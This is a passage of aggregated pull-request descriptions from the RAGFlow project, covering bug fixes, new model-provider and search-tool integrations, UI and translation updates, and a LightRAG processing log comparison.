| {'db_name': 'default_db', 'retrieval_type': 'infinity'} | localhost | 4 | infinity | 23817 | retrieval |
| {'database': 1, 'mq_type': 'redis', 'password': 'infini_rag_flow'} | localhost | 5 | redis | 6379 | message_queue |
+-------------------------------------------------------------------------------------------+-----------+----+---------------+-------+----------------+
```
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Signed-off-by: jinhai <haijin.chn@gmail.com>
### What problem does this PR solve?
This PR is related to
[#9961](https://github.com/infiniflow/ragflow/issues/9961).
In the Chat Settings screen, the textarea did not support scrolling when
the content grew longer than its visible area, which made it less
convenient to use.
Also, there was no Japanese placeholder text to guide users on what to
enter in the field.
This PR improves the user experience by:
- Adding `overflow-y-auto` to the textarea so that long content can be
scrolled smoothly.
- Introducing a placeholder (`メッセージを入力してください...`) to provide clearer
guidance for users.
https://github.com/user-attachments/assets/95553331-087b-42c5-a41d-5dfe08047bae
### What has been considered
As an alternative solution, I explored replacing the textarea with the
existing `PromptEditor` component.
However, this approach triggered a `canvas not found.` alert.
The current implementation of `PromptEditor` internally attempts to
fetch **agent (canvas) information**, but in the Chat Settings screen no
such ID exists. As a result, the API call fails and the backend returns
`canvas not found.`.
One possible workaround would be to extend `PromptEditor` with a
**“disable variable picker” flag**, ensuring that plugins are not loaded
in contexts like Chat Settings. While feasible, this would have a
broader impact across the codebase.
Given these considerations, I decided to address the issue in a simpler
way by applying a Tailwind utility (`overflow-y-auto`). Since the UI
design is expected to change in the future, this solution is considered
sufficient for now.
<img width="1501" height="794" alt="Screenshot 2025-09-20 at 15 00 12"
src="https://github.com/user-attachments/assets/85578ee8-489f-4ede-b3af-bafd7afe95bd"
/>
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Skip `tag_query` step if `tag_kbs` are empty.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[Bug]: anthropic model have not baseurl selecting,need add #8546
change:
This PR adds support for using Anthropic models through a third-party
API by allowing a custom base_url.
It ensures compatibility with both the official Anthropic endpoint and
external providers.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix the rerank_model condition logic by correcting the np.isclose check.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Support server health check. Solved issue: #10106
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add file convert to document API just like file2document_app.py
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the knowledge base's embedded model form layout and
dependency imports in the main branch.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Migrate OpenAI-compatible chats to LiteLLM.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Merge different types of models from the same manufacturer #10146
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Handle zero and nan in calculate.
#10125
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Related PR:
Feat: add CometAPI to LLMFactory and update related mappings #10119
Change:
Fixes the issue where the embedding model in CometAPI was not being
called correctly
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: TensorNull <tensor.null@gmail.com>
### What problem does this PR solve?
Add support for KB document basic info
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### Related issues
#10078
### What problem does this PR solve?
Integrate CometAPI provider.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
### What problem does this PR solve?
The original text for vectorSimilarityWeight in Chinese version was
"相似度相似度权重," which is obviously a malformed phrase. It has now been
changed to "向量相似度权重". Also, align it with the English version 'Vector
similarity weight'.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Support image recognition with image links in markdown files, solved
issue: #8755
Fixed log info error in code_exec, solved issue: #10064
### Type of change (8755)
- [x] New Feature (non-breaking change which adds functionality)
### Type of change (10064)
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Dataflow support audio. And fix giteeAI's sequence2text model.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
An exception happens if you give session_id to agent_open_ai completion.
Because session_id is being given as well as **req so it tries to send
session_id twice. But also the logic seemed odd on picking one of
session_id, id, metadata.id. So cleaned it up a little.
See #10111
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR fixes incorrect naming for PostgreSQL usage by replacing all
instances of `postgresql` with the correct `postgres` in the `db_type`
field. This resolves potential configuration errors and ensures
consistency when specifying the database type.
Also fixed handling of None for `get_queue_length`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: cucusenok <BP-116: updated readme.md>
### What problem does this PR solve?
issue:
[Bug]: Agent component (HTTP Request) "'>' not supported between
instances of 'int' and 'NoneType'"
[#10096](https://github.com/infiniflow/ragflow/issues/10096)
Change:
When the Invoke class instantiates HtmlParser without providing the
chunk_token_num parameter, the value defaults to None, leading to a
comparison error with block_token_count.
This change sets the default chunk_token_num to 512 to prevent such
errors.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: BadwomanCraZY <511528396@qq.com>
### What problem does this PR solve?
support parse image by OCR or VLM.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add support for the Ascend table structure recognizer.
Use the environment variable `TABLE_STRUCTURE_RECOGNIZER_TYPE=ascend` to
enable the Ascend table structure recognizer.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Updated SQL assistant template to wrap variables like 'sys.query' and
'Agent:WickedGoatsDivide@content' in curly braces for better template
variable syntax consistency.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Supports Ascend layout recognizer.
Use the environment variable `LAYOUT_RECOGNIZER_TYPE=ascend` to enable
the Ascend layout recognizer, and `ASCEND_LAYOUT_RECOGNIZER_DEVICE_ID=n`
(for example, n=0) to specify the Ascend device ID.
Ensure that you have installed the [ais
tools](https://gitee.com/ascend/tools/tree/master/ais-bench_workload/tool/ais_bench)
properly.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
judge not empty before delete session.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The same model appears twice in the drop-down box. #10102
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
…release workflow (#10039)
This change updates the GitHub Actions workflow to push additional
stable tags alongside version tags, enabling automated update tools like
Watchtower to detect and pull the latest images correctly.
Refs:
[https://github.com/infiniflow/ragflow/issues/10039](https://github.com/infiniflow/ragflow/issues/10039)
### What problem does this PR solve?
Automated container update tools such as Watchtower rely on stable tags
like `latest` to identify the newest images. Previously, only
version-specific tags were pushed, which prevented these tools from
detecting new releases automatically. This PR adds multiple stable tags
(`latest-full`, `latest-slim`) alongside version tags to the Docker
image publishing workflow, ensuring smooth and reliable automated
updates without manual tag management.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
### What problem does this PR solve?
terminate onnx inference session and release memory manually.
Issue #5050
Issue #9992
Issue #8805
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Translate the fields of the embedded dialog box on the agent page
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The chat dialog box cannot be fully displayed on a small screen #10034
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Hide dataflow related functions #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix text input exceed token num limit when using siliconflow's embedding
model BAAI/bge-large-zh-v1.5 and BAAI/bge-large-en-v1.5, truncate before
input.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Translate the parser operator #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
feat: Added UI functions related to data-flow knowledge base #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Import dsl from agent list page #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update default LLM configuration with BAAI and model details #9404
- Add SMTP configuration section #9479
- Add OpenDAL storage configuration option #8232
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add type card to create agent dialog #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where newly added tool operators would disappear
after editing the form #10013
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Dataflow supports markdown.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Dataflow supports Spreadsheet and Word processor document
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.4 to v0.20.5
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Translate the maxRounds field of the chat settings #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The prompt words "plan" are displayed only when the agent operator
has sub-agent operators or sub-tool operators. . #10000
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Optimize search functionality
- Fixed search limitations when no dataset is selected
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Optimized the table of contents style and homepage card layout
#3221
- Added background color, text color, and shadow styles to the Markdown
table of contents
- Optimized the date display style in the HomeCard component to prevent
overflow
- Standardized the translation of "dataset" to "knowledge base" to
improve terminology consistency
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Highlight the edges after running #9538
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Issue of ineffective weight adjustment for retrieval_test
API-related functions #9854
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add ParserForm to the data pipeline #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add LongCat-Flash-Chat from Meituan, deepseek v3.1 from SiliconFlow,
kimi-k2-09-05-preview and kimi-k2-turbo-preview from Moonshot.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The agent's external page should be able to fill in the begin
parameter after being reset in task mode #9745
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Update the pagination prompt text in zh.ts, changing "page" to
"item/page"
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add ConfirmDeleteDialog storybook #9914
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Optimized the test results page layout and internationalization
- Added an empty data component for when test results are empty
- Optimized internationalization support for the paging component
- Updated the layout and style of the test results page
- Added a tooltip for when test results are empty
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The files in the knowledge base folder on the file management page
should not be deleted #9975
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete unused code in the data pipeline #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The total token was incorrectly accumulated when using the
OpenAI-API-Compatible api.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Refine dataflow and initialize dataflow app.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Use sonner to replace the requested prompt message component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Allow users to select prompt word templates in agent operators.
#9935
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
-Added the metadata_dedition parameter in the document retrieval
interface to filter document metadata -Updated the API documentation and
added explanations for the metadata_dedition parameter
### What problem does this PR solve?
Make /api/v1/retrieval api also can use metadata filter
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] Refactoring
- [x] Performance Improvement
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
Moved `signature_version` and `addressing_style` parameters to a
`Config` object from `botocore.config`
`signature_version` is now passed as `Config(signature_version='v4')`
`addressing_style` is now passed as `Config(s3={'addressing_style':
'path'})`
The `Config` object is then passed to `boto3.client()` via the `config`
parameter
## Changes Made
- Modified `rag/utils/s3_conn.py` in the `__open__()` method
- Updated parameter handling logic to use `config_kwargs` dictionary
- Maintained backward compatibility for configurations without these
parameters
## Related Issue
Fixes#9910
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Syed Shahmeer Ali <ashahmeer73@gmail.com>
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
- [x] Performance Improvement
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
fix: Optimize internationalization configuration
- Update multi-language options, adding general translations for
functions like Select All and Clear
- Add internationalization support for modules like Chat, Search, and
Datasets
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Added RenameDialog NumberInput and Spin storybook
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR fixes a critical bug in the knowledge base isolation feature
where chat responses were referencing documents from incorrect knowledge
bases. The issue was in the `infinity_conn.py` file where the
`equivalent_condition_to_str()` function was incorrectly skipping
`kb_id` filtering, causing documents from unintended knowledge bases to
be included in search results.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Syed Shahmeer Ali <ashahmeer73@gmail.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
Fix the issue in ci.
[ci
err](https://github.com/infiniflow/ragflow/actions/runs/17452439789/job/49559702590?pr=9894)
```
Container ragflow-redis Error response from daemon: Conflict. The container name "/ragflow-redis" is already in use by container "b6cbde4d186ffba701f6e2a85f37e1d053d7197adb2938547f1df08cfcadf355". You have to remove (or rename) that container to be able to reuse that name.
Error response from daemon: Conflict. The container name "/ragflow-redis" is already in use by container "b6cbde4d186ffba701f6e2a85f37e1d053d7197adb2938547f1df08cfcadf355". You have to remove (or rename) that container to be able to reuse that name.
Error: Process completed with exit code 1.
```
### Type of change
- [x] Refactoring
- [x] Performance Improvement
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
Feat: Display AvatarUpload and RAGFlowAvatar in Storybook #9914
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix wrong chunk number while re-parsing document and keeping original
chunks
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Use storybook to display public components. #9914
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
HTTP API documentation incorrectly refers `agent_name` as `name` instead
of `title`. This PR updates that documentation with the correct terms.
As per the codebase, the GET request for listing agents is accepting
`title` as a parameter:
9b026fc5b6/api/apps/sdk/agent.py (L32)
This is referred to as `name` parameter in the HTTP API documentation
([link](https://ragflow.io/docs/dev/http_api_reference#list-documents))
```
GET /api/v1/datasets/{dataset_id}/documents?page={page}&page_size={page_size}&orderby={orderby}&desc={desc}&keywords={keywords}&id={document_id}&name={document_name}&create_time_from={timestamp}&create_time_to={timestamp}
```
Meanwhile, it is correctly mentioned in the Python API docs
([link](https://ragflow.io/docs/dev/python_api_reference#list-agents)):
```
RAGFlow.list_agents(
page: int = 1,
page_size: int = 30,
orderby: str = "create_time",
desc: bool = True,
id: str = None,
title: str = None
) -> List[Agent]
```
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
During the chat, the assistant's response cited documents outside the
current knowledge base。
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow users to enter SQL in the SQL operator #9897
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add `canvas_category` field for UserCanvas and CanvasTemplate.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add exponential back-off for Chat LiteLLM. #9858.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: The operator added by clicking the plus sign will overlap with the
original operator. #9886
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Optimize list display and rename functionality #3221
- Updated the homepage search list display style and added rename
functionality
- Used the RenameDialog component for rename searches
- Optimized list height calculation
- Updated the style and layout of related pages
- fix issue #9779
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- Add robust serialize_for_json() function to handle non-serializable
objects
- Update server_error_response() to safely serialize exception data
- Update get_json_result() with fallback error handling
- Handles ModelMetaclass, functions, and other problematic objects
- Maintains proper JSON response format instead of server crashes
Fixes#9797
### What problem does this PR solve?
Currently, error responses and certain result objects may include types
that are not JSON serializable (e.g., ModelMetaclass, functions). This
causes server crashes instead of returning valid JSON responses.
This PR introduces a robust serializer that converts unsupported types
into string representations, ensuring the server always returns a valid
JSON response.
### Type of change
- [] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Initialize the data pipeline canvas. #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: By default, 50 records are displayed per page. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where the agent and chat cards on the home page
could not be deleted #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The default value for OpenAI '/v1/embeddings' parameter
'encoding_format' is 'base64'. Use 'float' explicitly to avoid base64
encoding & decoding, larger data size.
https://github.com/openai/openai-python/blob/main/src/openai/resources/embeddings.py
if not is_given(encoding_format):
params["encoding_format"] = "base64"
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Move the dataset permission drop-down box to a separate file for
better permission control #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Optimize page layout and style #3221
- Added the cursor-pointer class to the logo in the Header component
- Added an icon property to the ListFilterBar in the Agents and ChatList
components
- Adjusted the Dataset page layout and set a minimum width
- Optimized the DatasetWrapper page layout and added the overflow-auto
class
- Simplified the search icon in the SearchList component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Optimize styling and add a search settings loading state #3221
- Updated the calendar component's background color to use a variable
- Modified the Spin component's styling to use the primary text color
instead of black
- Added a form submission loading state to the search settings component
- Optimized the search settings form, unifying the styles of the model
selection and input fields
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Create a conversation before uploading files #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This revision performed a comprehensive check on LightRAG to ensure the
correctness of its implementation. It **did not involve** Entity
Resolution and Community Reports Generation. There is an example using
default entity types and the General chunking method, which shows good
results in both time and effectiveness. Moreover, response caching is
enabled for resuming failed tasks.
[The-Necklace.pdf](https://github.com/user-attachments/files/22042432/The-Necklace.pdf)
After:

```bash
Begin at:
Fri, 29 Aug 2025 16:48:03 GMT
Duration:
222.31 s
Progress:
16:48:04 Task has been received.
16:48:06 Page(1~7): Start to parse.
16:48:06 Page(1~7): OCR started
16:48:08 Page(1~7): OCR finished (1.89s)
16:48:11 Page(1~7): Layout analysis (3.72s)
16:48:11 Page(1~7): Table analysis (0.00s)
16:48:11 Page(1~7): Text merged (0.00s)
16:48:11 Page(1~7): Finish parsing.
16:48:12 Page(1~7): Generate 7 chunks
16:48:12 Page(1~7): Embedding chunks (0.29s)
16:48:12 Page(1~7): Indexing done (0.04s). Task done (7.84s)
16:48:17 Start processing for f421fb06849e11f0bdd32724b93a52b2: She had no dresses, no je...
16:48:17 Start processing for f421fb06849e11f0bdd32724b93a52b2: Her husband, already half...
16:48:17 Start processing for f421fb06849e11f0bdd32724b93a52b2: And this life lasted ten ...
16:48:17 Start processing for f421fb06849e11f0bdd32724b93a52b2: Then she asked, hesitatin...
16:49:30 Completed processing for f421fb06849e11f0bdd32724b93a52b2: She had no dresses, no je... after 1 gleanings, 21985 tokens.
16:49:30 Entities extraction of chunk 3 1/7 done, 12 nodes, 13 edges, 21985 tokens.
16:49:40 Completed processing for f421fb06849e11f0bdd32724b93a52b2: Finally, she replied, hes... after 1 gleanings, 22584 tokens.
16:49:40 Entities extraction of chunk 5 2/7 done, 19 nodes, 19 edges, 22584 tokens.
16:50:02 Completed processing for f421fb06849e11f0bdd32724b93a52b2: Then she asked, hesitatin... after 1 gleanings, 24610 tokens.
16:50:02 Entities extraction of chunk 0 3/7 done, 16 nodes, 28 edges, 24610 tokens.
16:50:03 Completed processing for f421fb06849e11f0bdd32724b93a52b2: And this life lasted ten ... after 1 gleanings, 24031 tokens.
16:50:04 Entities extraction of chunk 1 4/7 done, 24 nodes, 22 edges, 24031 tokens.
16:50:14 Completed processing for f421fb06849e11f0bdd32724b93a52b2: So they begged the jewell... after 1 gleanings, 24635 tokens.
16:50:14 Entities extraction of chunk 6 5/7 done, 27 nodes, 26 edges, 24635 tokens.
16:50:29 Completed processing for f421fb06849e11f0bdd32724b93a52b2: Her husband, already half... after 1 gleanings, 25758 tokens.
16:50:29 Entities extraction of chunk 2 6/7 done, 25 nodes, 35 edges, 25758 tokens.
16:51:35 Completed processing for f421fb06849e11f0bdd32724b93a52b2: The Necklace By Guy de Ma... after 1 gleanings, 27491 tokens.
16:51:35 Entities extraction of chunk 4 7/7 done, 39 nodes, 37 edges, 27491 tokens.
16:51:35 Entities and relationships extraction done, 147 nodes, 177 edges, 171094 tokens, 198.58s.
16:51:35 Entities merging done, 0.01s.
16:51:35 Relationships merging done, 0.01s.
16:51:35 ignored 7 relations due to missing entities.
16:51:35 generated subgraph for doc f421fb06849e11f0bdd32724b93a52b2 in 198.68 seconds.
16:51:35 run_graphrag f421fb06849e11f0bdd32724b93a52b2 graphrag_task_lock acquired
16:51:35 set_graph removed 0 nodes and 0 edges from index in 0.00s.
16:51:35 Get embedding of nodes: 9/147
16:51:35 Get embedding of nodes: 109/147
16:51:37 Get embedding of edges: 9/170
16:51:37 Get embedding of edges: 109/170
16:51:40 set_graph converted graph change to 319 chunks in 4.21s.
16:51:40 Insert chunks: 4/319
16:51:40 Insert chunks: 104/319
16:51:40 Insert chunks: 204/319
16:51:40 Insert chunks: 304/319
16:51:40 set_graph added/updated 147 nodes and 170 edges from index in 0.53s.
16:51:40 merging subgraph for doc f421fb06849e11f0bdd32724b93a52b2 into the global graph done in 4.79 seconds.
16:51:40 Knowledge Graph done (204.29s)
```
Before:

```bash
Begin at:
Fri, 29 Aug 2025 17:00:47 GMT
processDuration:
173.38 s
Progress:
17:00:49 Task has been received.
17:00:51 Page(1~7): Start to parse.
17:00:51 Page(1~7): OCR started
17:00:53 Page(1~7): OCR finished (1.82s)
17:00:57 Page(1~7): Layout analysis (3.64s)
17:00:57 Page(1~7): Table analysis (0.00s)
17:00:57 Page(1~7): Text merged (0.00s)
17:00:57 Page(1~7): Finish parsing.
17:00:57 Page(1~7): Generate 7 chunks
17:00:57 Page(1~7): Embedding chunks (0.31s)
17:00:57 Page(1~7): Indexing done (0.03s). Task done (7.88s)
17:00:57 created task graphrag
17:01:00 Task has been received.
17:02:17 Entities extraction of chunk 1 1/7 done, 9 nodes, 9 edges, 10654 tokens.
17:02:31 Entities extraction of chunk 2 2/7 done, 12 nodes, 13 edges, 11066 tokens.
17:02:33 Entities extraction of chunk 4 3/7 done, 9 nodes, 10 edges, 10433 tokens.
17:02:42 Entities extraction of chunk 5 4/7 done, 11 nodes, 14 edges, 11290 tokens.
17:02:52 Entities extraction of chunk 6 5/7 done, 13 nodes, 15 edges, 11039 tokens.
17:02:55 Entities extraction of chunk 3 6/7 done, 14 nodes, 13 edges, 11466 tokens.
17:03:32 Entities extraction of chunk 0 7/7 done, 19 nodes, 18 edges, 13107 tokens.
17:03:32 Entities and relationships extraction done, 71 nodes, 89 edges, 79055 tokens, 149.66s.
17:03:32 Entities merging done, 0.01s.
17:03:32 Relationships merging done, 0.01s.
17:03:32 ignored 1 relations due to missing entities.
17:03:32 generated subgraph for doc b1d9d3b6848711f0aacd7ddc0714c4d3 in 149.69 seconds.
17:03:32 run_graphrag b1d9d3b6848711f0aacd7ddc0714c4d3 graphrag_task_lock acquired
17:03:32 set_graph removed 0 nodes and 0 edges from index in 0.00s.
17:03:32 Get embedding of nodes: 9/71
17:03:33 Get embedding of edges: 9/88
17:03:34 set_graph converted graph change to 161 chunks in 2.27s.
17:03:34 Insert chunks: 4/161
17:03:34 Insert chunks: 104/161
17:03:34 set_graph added/updated 71 nodes and 88 edges from index in 0.28s.
17:03:34 merging subgraph for doc b1d9d3b6848711f0aacd7ddc0714c4d3 into the global graph done in 2.60 seconds.
17:03:34 Knowledge Graph done (153.18s)
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Allow users to delete their profile pictures #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Optimized the style and functionality of multiple components #3221
- Modified the SkeletonCard component, adding a className attribute and
adjusting the style
- Updated the RAGFlowSelect component, adding a disabled attribute
- Adjusted the style of the Tooltip component
- Optimized the layout of the RetrievalTesting and TestingResult pages
- Updated the style and loading status display of NextSearch-related
pages
- Removed unnecessary logs from the Spotlight component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR integrates SearXNG as a new search tool for Agents. It adds
corresponding form/config UI on the frontend and a new tool
implementation on the backend, enabling aggregated web searches via a
self-hosted SearXNG instance within chats/workflows. It also adds
multilingual copy to support internationalized presentation and
configuration guidance.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What’s Changed
- Frontend: new SearXNG tool configuration, forms, and command wiring
- Main changes under `web/src/pages/agent/`
- New components and form entries are connected to Agent tool selection
and workflow node configuration
- Backend: new tool implementation
- `agent/tools/searxng.py`: connects to a SearXNG instance and performs
search based on the provided instance URL and query parameters
- i18n updates
- Added/updated keys under `web/src/locales/`: `searXNG` and
`searXNGDescription`
- English reference in
[web/src/locales/en.ts](cci:7://file:///c:/Users/ruy_x/Work/CRSC/2025/Software_Development/2025.8/ragflow-pr/ragflow/web/src/locales/en.ts:0:0-0:0):
- `searXNG: 'SearXNG'`
- `searXNGDescription: 'A component that searches via your provided
SearXNG instance URL. Specify TopN and the instance URL.'`
- Other languages have `searXNG` and `searXNGDescription` added as well,
but accuracy is only guaranteed for English, Simplified Chinese, and
Traditional Chinese.
---------
Co-authored-by: xurui <xurui@crscd.com.cn>
### What problem does this PR solve?
Fix: Fixed the issue that similarity threshold modification in chat and
search configuration failed #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix Ollama chat can only access localhost instance. #9806.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Optimized Input and MultiSelect component functionality and
dataSet-chunk page styling
- Updated @js-preview/excel to version 1.7.14 #9779
- Optimized the EditTag component
- Updated the Input component to optimize numeric input processing
- Adjusted the MultiSelect component to use lodash's isEmpty method
- Optimized the CheckboxSets component to display action buttons based
on the selected state
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Extract the save buttons for dataset and chat configurations to
separate files to increase permission control #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where the thinking mode on the chat page could not
be turned off #9789
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Unify reference format of agent completion and OpenAI-compatible
completion API.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Fix: Optimized variable node display and Agent template multi-language
